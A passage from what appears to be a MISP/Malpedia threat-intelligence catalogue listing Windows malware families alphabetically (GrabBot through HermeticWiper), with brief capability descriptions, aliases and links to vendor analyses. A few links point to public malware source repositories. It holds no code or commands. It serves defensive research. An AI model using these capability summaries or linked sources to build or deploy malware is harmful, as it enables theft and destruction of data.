https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://securelist.com/financial-cyberthreats-in-2020/101638/

http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html

https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/

https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance

https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/

https://lokalhost.pl/gozi_tree.txt

https://www.youtube.com/watch?v=BcFbkjUVc7o

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072

https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef

GrabBot

The tag is: misp-galaxy:malpedia="GrabBot"

GrabBot is also known as:

Table 3608. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot

http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data

Grandoreiro

According to ESET Research, Grandoreirois a Latin American banking trojan targeting Brazil, Mexico, Spain and Peru. As such, it shows unusual effort by its authors to evade detection and emulation, and progress towards a modular architecture.

The tag is: misp-galaxy:malpedia="Grandoreiro"

Grandoreiro is also known as:

Table 3611. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grandoreiro

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/grandoreiro-banking-malware-resurfaces-for-tax-season

http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853

https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

https://www.metabaseq.com/grandoreiro-banking-malware-deciphering-the-dga/

https://www.incibe.es/sites/default/files/contenidos/estudios/doc/incibe-cert_study_grandoreiro_analysis_2022_v1.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/

https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/

https://www.proofpoint.com/us/blog/threat-insight/copacabana-barcelona-cross-continental-threat-brazilian-banking-malware

https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks

https://blueliv.com/resources/reports/MiniReport-Blueliv-Bancos-ESP-LAT.pdf

GrandSteal

The tag is: misp-galaxy:malpedia="GrandSteal"

GrandSteal is also known as:

Table 3612. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grandsteal

http://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html

Graphican

According to Symantec, Graphican is an evolution of the known APT15 backdoor Ketrican, which itself was based on a previous malware - BS2005 - also used by APT15. Graphican has the same basic functionality as Ketrican, with the difference between them being Graphican’s use of the Microsoft Graph API and OneDrive to obtain its command-and-control (C&C) infrastructure.

The tag is: misp-galaxy:malpedia="Graphican"

Graphican is also known as:

Table 3615. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.graphican

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/flea-backdoor-microsoft-graph-apt15

Graphiron

Downloader / information stealer used by UAC-0056, observed since at least October 2022.

The tag is: misp-galaxy:malpedia="Graphiron"

Graphiron is also known as:

Table 3616. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.graphiron

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer

https://www.secureworks.com/research/the-growing-threat-from-infostealers

Graphite

Trellix describes Graphite as a malware using the Microsoft Graph API and OneDrive for C&C. It was found being deployed in-memory only and served as a downloader for Empire.

The tag is: misp-galaxy:malpedia="Graphite"

Graphite is also known as:

Table 3617. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.graphite

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf

https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/

https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html

Grateful POS

POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. Masked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.

The tag is: misp-galaxy:malpedia="Grateful POS"

Grateful POS is also known as:

  • FrameworkPOS

  • SCRAPMINT

  • trinity

Table 3620. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf

http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html

http://www.secureworks.com/research/threat-profiles/gold-franklin

https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/

https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season

https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf

Gratem

The tag is: misp-galaxy:malpedia="Gratem"

Gratem is also known as:

Table 3621. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem

GreenShaitan

The tag is: misp-galaxy:malpedia="GreenShaitan"

GreenShaitan is also known as:

  • eoehttp

Table 3624. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan

https://blog.cylance.com/spear-a-threat-actor-resurfaces

GreetingGhoul

The tag is: misp-galaxy:malpedia="GreetingGhoul"

GreetingGhoul is also known as:

Table 3625. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.greetingghoul

https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/

GRILLMARK

This is a proxy-aware HTTP backdoor that is implemented as a service and uses the compromised system’s proxy settings to access the internet. C&C traffic is base64 encoded and the files sent to the server are compressed with aPLib.

The tag is: misp-galaxy:malpedia="GRILLMARK"

GRILLMARK is also known as:

  • Hellsing Backdoor

Table 3627. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark

https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/

https://content.fireeye.com/m-trends/rpt-m-trends-2019

GRIMAGENT

GRIMAGENT is a backdoor that can execute arbitrary commands, download files, create and delete scheduled tasks, and execute programs via scheduled tasks or via the ShellExecute API. The malware persists via a randomly named scheduled task and a registry Run key. The backdoor communicates to hard-coded C&C servers via HTTP requests with portions of its network communications encrypted using both asymmetric and symmetric cryptography. GRIMAGENT was used during some Ryuk Ransomware intrusions in 2020.

The tag is: misp-galaxy:malpedia="GRIMAGENT"

GRIMAGENT is also known as:

Table 3628. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent

https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer

https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets

https://twitter.com/bryceabdo/status/1352359414746009608

https://blog.group-ib.com/grimagent

GrimPlant

This malware was seen during the cyberattacks on Ukrainian state organizations. It is one of two used backdoors written in Go and attributed to UAC-0056 (SaintBear, UNC2589, TA471).

The tag is: misp-galaxy:malpedia="GrimPlant"

GrimPlant is also known as:

Table 3629. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant

https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview

https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/

https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/

https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/

https://www.mandiant.com/resources/spear-phish-ukrainian-entities

https://cert.gov.ua/article/38374

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830

https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/

https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine

GROK

The tag is: misp-galaxy:malpedia="GROK"

GROK is also known as:

Table 3630. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.grok

https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/

Growtopia

According to PCrisk, Growtopia (also known as CyberStealer) is an information stealer written in the C# programming language. It can obtain system information, steal information from various applications, and capture screenshots. Its developer claims that it has created this software for educational purposes only. This stealer uses the name of a legitimate online game.

The tag is: misp-galaxy:malpedia="Growtopia"

Growtopia is also known as:

Table 3631. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.growtopia

https://github.com/TheC0mpany/GrowtopiaStealer

gsecdump

The tag is: misp-galaxy:malpedia="gsecdump"

gsecdump is also known as:

Table 3633. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump

https://attack.mitre.org/wiki/Technique/T1003

GSpy

A malware family with a DGA.

The tag is: misp-galaxy:malpedia="GSpy"

GSpy is also known as:

Table 3634. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gspy

https://www.virustotal.com/gui/file/0a062a1cbcd05f671f5c3fe5575e29fdd9e13deeb9f34f1ee9ffa6b75835668f/detection

H1N1 Loader

The tag is: misp-galaxy:malpedia="H1N1 Loader"

H1N1 Loader is also known as:

Table 3637. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1

https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities

HackSpy

Py2Exe based tool as found on github.

The tag is: misp-galaxy:malpedia="HackSpy"

HackSpy is also known as:

Table 3640. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy

https://github.com/ratty3697/HackSpy-Trojan-Exploit

Hades

According to PCrisk, Hades Locker is an updated version of WildFire Locker ransomware that infiltrates systems and encrypts a variety of data types using AES encryption. Hades Locker appends the names of encrypted files with the ".~HL[5_random_characters] (first 5 characters of encryption password)" extension.

The tag is: misp-galaxy:malpedia="Hades"

Hades is also known as:

Table 3641. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hades

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/

https://www.accenture.com/us-en/blogs/security/ransomware-hades

https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp

https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities

https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://twitter.com/inversecos/status/1381477874046169089?s=20

https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://awakesecurity.com/blog/incident-response-hades-ransomware-gang-or-hafnium/

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf

https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure

https://www.accenture.com/us-en/blogs/cyber-defense/unknown-threat-group-using-hades-ransomware

http://www.secureworks.com/research/threat-profiles/gold-winter

Hakbit

Hakbit ransomware is written in .NET. It uploads (some) files to be encrypted to a ftp-server. The ransom note is embedded - in earlier versions as plain string, then as base64 string. In some versions, these strings are slightly obfuscated.

Contact is via an email address hosted on protonmail. Hakbit (original) had hakbit@, more recent "KiraLock" has kiraransom@ (among others of course).

The tag is: misp-galaxy:malpedia="Hakbit"

Hakbit is also known as:

  • Thanos Ransomware

Table 3642. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hakbit

https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf

https://unit42.paloaltonetworks.com/thanos-ransomware/

https://securelist.com/cis-ransomware/104452/

https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/

https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html

https://unit42.paloaltonetworks.com/prometheus-ransomware/

https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4

https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/

https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/

https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/

https://www.sekoia.io/en/the-story-of-a-ransomware-builder-from-thanos-to-spook-and-beyond-part-1/

https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.justice.gov/usao-edny/press-release/file/1505981/download

https://blog.cyble.com/2021/06/05/prometheus-an-emerging-apt-group-using-thanos-ransomware-to-target-organizations/

https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/

https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware

HALFRIG

A stager used by APT29 to deploy CobaltStrike.

The tag is: misp-galaxy:malpedia="HALFRIG"

HALFRIG is also known as:

Table 3643. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.halfrig

https://www.gov.pl/attachment/64193e8d-05e2-4cbf-bb4c-5f58da21fefb

Hancitor

Hancitor(aka Chanitor) emerged in 2013 which spread via social engineering techniques mainly through phishing mails embedded with malicious link and weaponized Microsoft office document contains malicious macro in it.

The tag is: misp-galaxy:malpedia="Hancitor"

Hancitor is also known as:

  • Chanitor

Table 3645. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor

https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/

https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/

https://malware-traffic-analysis.net/2021/09/29/index.html

https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/

https://blog.group-ib.com/hancitor-cuba-ransomware

https://inquest.net/blog/2021/04/16/unearthing-hancitor-infrastructure

https://github.com/OALabs/Lab-Notes/blob/main/Hancitor/hancitor.ipynb

https://medium.com/@crovax/extracting-hancitors-configuration-with-ghidra-7963900494b5

https://twitter.com/TheDFIRReport/status/1359669513520873473

https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-making-use-of-cookies-to-prevent-url-scraping

https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader

https://pid4.io/posts/how_to_write_a_hancitor_extractor/

https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/

https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/

https://www.malware-traffic-analysis.net/2021/09/29/index.html

https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-analysing-the-main-loader/

https://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8

https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618

https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/

https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon

https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak

https://isc.sans.edu/diary/rss/27618

https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor

https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/

https://unit42.paloaltonetworks.com/wireshark-tutorial-hancitor-followup-malware/

https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html

https://www.silentpush.com/blog/pivoting-finding-malware-domains-without-seeing-malicious-activity

https://cyber-anubis.github.io/malware%20analysis/hancitor/

https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear

https://blog.group-ib.com/prometheus-tds

https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/

https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/

https://muha2xmad.github.io/malware-analysis/fullHancitor/

https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/

https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/

https://blog.group-ib.com/switching-side-jobs

https://www.vmray.com/cyber-security-blog/hancitor-multi-step-delivery-process-malware-analysis-spotlight/

https://www.uperesia.com/hancitor-packer-demystified

https://muha2xmad.github.io/unpacking/hancitor/

https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html

HappyLocker (HiddenTear?)

The tag is: misp-galaxy:malpedia="HappyLocker (HiddenTear?)"

HappyLocker (HiddenTear?) is also known as:

Table 3646. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker

Havex RAT

Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as "Dragonfly" and "Energetic Bear". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.

Once installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.

Havex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.

The tag is: misp-galaxy:malpedia="Havex RAT"

Havex RAT is also known as:

Table 3651. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat

https://www.f-secure.com/weblog/archives/00002718.html

https://www.secureworks.com/research/threat-profiles/iron-liberty

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://www.cisa.gov/uscert/ncas/alerts/aa22-083a

https://vblocalhost.com/uploads/VB2021-Slowik.pdf

https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/

HAWKBALL

HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.

The tag is: misp-galaxy:malpedia="HAWKBALL"

HAWKBALL is also known as:

Table 3653. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkball

https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html

HawkEye Keylogger

HawKeye is a keylogger that is distributed since 2013. Discovered by IBM X-Force, it is currently spread over phishing campaigns targeting businesses on a worldwide scale. It is designed to steal credentials from numerous applications but, in the last observed versions, new "loader capabilities" have been spotted. It is sold by its development team on dark web markets and hacking forums.

The tag is: misp-galaxy:malpedia="HawkEye Keylogger"

HawkEye Keylogger is also known as:

  • HawkEye

  • HawkEye Reborn

  • Predator Pain

Table 3654. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/

https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/

https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/

https://www.cyberbit.com/hawkeye-malware-keylogging-technique/

https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter

https://github.com/itaymigdal/malware-analysis-writeups/blob/main/HawkEye/HawkEye.md

http://www.secureworks.com/research/threat-profiles/gold-galleon

https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/

https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/

https://www.secureworks.com/research/threat-profiles/gold-galleon

https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/

https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry

http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html

https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/

https://securelist.com/apt-trends-report-q2-2019/91897/

HDMR

HDMR is a ransomware which encrypts user files and adds a .DMR64 extension. It also drops a ransom note named: "!!! READ THIS !!!.hta".

The tag is: misp-galaxy:malpedia="HDMR"

HDMR is also known as:

  • GO-SPORT

Table 3656. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr

http://id-ransomware.blogspot.com/2019/10/hdmr-ransomware.html

https://twitter.com/malwrhunterteam/status/1205096379711918080/photo/1

HelloKitty (Windows)

Unit42 states that HelloKitty is a ransomware family that first surfaced at the end of 2020, primarily targeting Windows systems. The malware family got its name due to its use of a Mutex with the same name: HelloKittyMutex. The ransomware samples seem to evolve quickly and frequently, with different versions making use of the .crypted or .kitty file extensions for encrypted files. Some newer samples make use of a Golang packer that ensures the final ransomware code is only loaded in memory, most likely to evade detection by security solutions.

The tag is: misp-galaxy:malpedia="HelloKitty (Windows)"

HelloKitty (Windows) is also known as:

  • KittyCrypt

Table 3662. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks

https://blog.malwarebytes.com/threat-spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/

https://unit42.paloaltonetworks.com/emerging-ransomware-groups/

https://cocomelonc.github.io/book/2023/12/13/malwild-book.html

https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/

https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html

https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html

https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/

https://medium.com/proferosec-osm/static-unpacker-and-decoder-for-hello-kitty-packer-91a3e8844cb7

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/

https://www.cisa.gov/uscert/ncas/alerts/aa22-249a

https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/

https://www.speartip.com/resources/fbi-hellokitty-ransomware-adds-ddos-to-extortion-arsenal/

https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-is-targeting-vulnerable-sonicwall-devices/

https://twitter.com/fwosar/status/1359167108727332868

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire

https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html

https://www.ic3.gov/Media/News/2021/211029.pdf

Heloag

The tag is: misp-galaxy:malpedia="Heloag"

Heloag is also known as:

Table 3664. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag

https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/

Herbst

The tag is: misp-galaxy:malpedia="Herbst"

Herbst is also known as:

Table 3666. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst

https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware

HermeticWiper

According to SentinelLabs, HermeticWiper is a custom-written application with very few standard functions. It abuses a signed driver called "empntdrv.sys" which is associated with the legitimate Software "EaseUS Partition Master Software" to enumerate the MBR and all partitions of all Physical Drives connected to the victims Windows Device and overwrite the first 512 Bytes of every MBR and Partition it can find, rendering them useless. This malware is associated to the malware attacks against Ukraine during Russians Invasion in February 2022.

The tag is: misp-galaxy:malpedia="HermeticWiper"

HermeticWiper is also known as:

  • DriveSlayer

  • FoxBlade

  • KillDisk.NCV

  • NEARMISS

Table 3669. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwiper

https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/

https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine

https://twitter.com/fr0gger_/status/1497121876870832128

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://www.zdnet.com/article/microsoft-finds-foxblade-malware-on-ukrainian-systems-removing-rt-from-windows-app-store/

https://twitter.com/Sebdraven/status/1496878431719473155

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/

https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/digging-into-hermeticwiper.html

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/defenders-blog-on-cyberattacks-targeting-ukraine.html

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf

https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware

https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/

